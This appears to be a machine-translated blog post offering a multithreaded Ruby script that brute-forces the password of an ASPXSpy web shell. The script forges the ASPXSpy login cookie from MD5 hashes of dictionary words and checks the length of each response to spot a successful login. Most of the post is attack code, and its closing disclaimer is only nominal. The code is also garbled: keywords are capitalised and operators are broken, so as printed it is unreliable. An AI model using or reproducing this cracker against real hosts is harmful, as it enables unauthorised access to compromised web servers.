Dictionary cracking aspxspy logon verification (ruby)

After reading some of the aspxspy verification code, you don't have to extract the form's username and password name to commit the attack. When aspxspy processes logon, it sets a cookie value after logon, therefore, the cookie can also be constructed. In this code, I use md5 to encrypt the password in the password dictionary into an MD5 string and pass it to the header in the http object, it sets the current COOKIE and finally submits the COOKIE over HTTP. I compare the returned page content to determine whether the logon is successful or not. In terms of efficiency, I have added multithreading support,

It is a pity that RUBY is not a native multi-threaded language and cannot fully utilize this feature of multiple CPU cores. It is only implemented by simulating multiple threads in a single process.

Usage of this program:

Path xx. rb aspxspy. aspx "> Number of http://www.xxx.com/aspxspy.aspx threads

# Repost this article to indicate the source

# This code is just an example of a practice that I learned about the RUBY language. Do not use this code for attacks. The consequences are at your own risk.

Require net/http
Require net/https
Require md5

Def read_dict
F = File.new(pass.txt)
F. each do | line |
$ Pass <line. chomp
End
F. close
End

Abort "usage: #$0 <website>" if $ * [0] = nil | $ * [1] = nil
Thread_number = $ * [1]. to_ I
Url = URI. parse ($ * [0])

Puts "[Target] # {url. host }:# {url. port }"
Puts "[Path] # {url. path }"
Puts "[*] start crack aspxspy login passowrd"

$ Pass = []

Read_dict

Threads = []

A = thread_number
B = 0
While a <= $ pass. length/thread_number
Pass_sub = []
While B <
Pass_sub <$ pass [B]
Break if pass_sub.length = thread_number
B + = 1
End
Pass_sub.each do | p |
Threads <Thread. new (p) do | tp |
# Sleep (rand (0.1 ))
Begin
Http = Net: HTTP. new (url. host, url. port)
Rescue
Print "[-] Http error, # {$ !} "
Self. kill
End
Print "[*] cracking [" + tp. chomp + "] =>" + MD5.hexdigest (tp. chomp) + ""
Headers = {
Cookie => ASPXSpy = + MD5.hexdigest (tp. chomp)
}

Begin
Resp, data = http. get (url. path, headers)
# Puts data
# Next if data. length <4000
Rescue
Print "[-] http response err, # {$ !} "
Self. kill
End

(Print "[*] Success! Current pass is # {tp. chomp} "; exit) if data. length> 4000
End
End
A + = thread_number
Threads. each {| te. join}
End
# Threads. each {| te. join}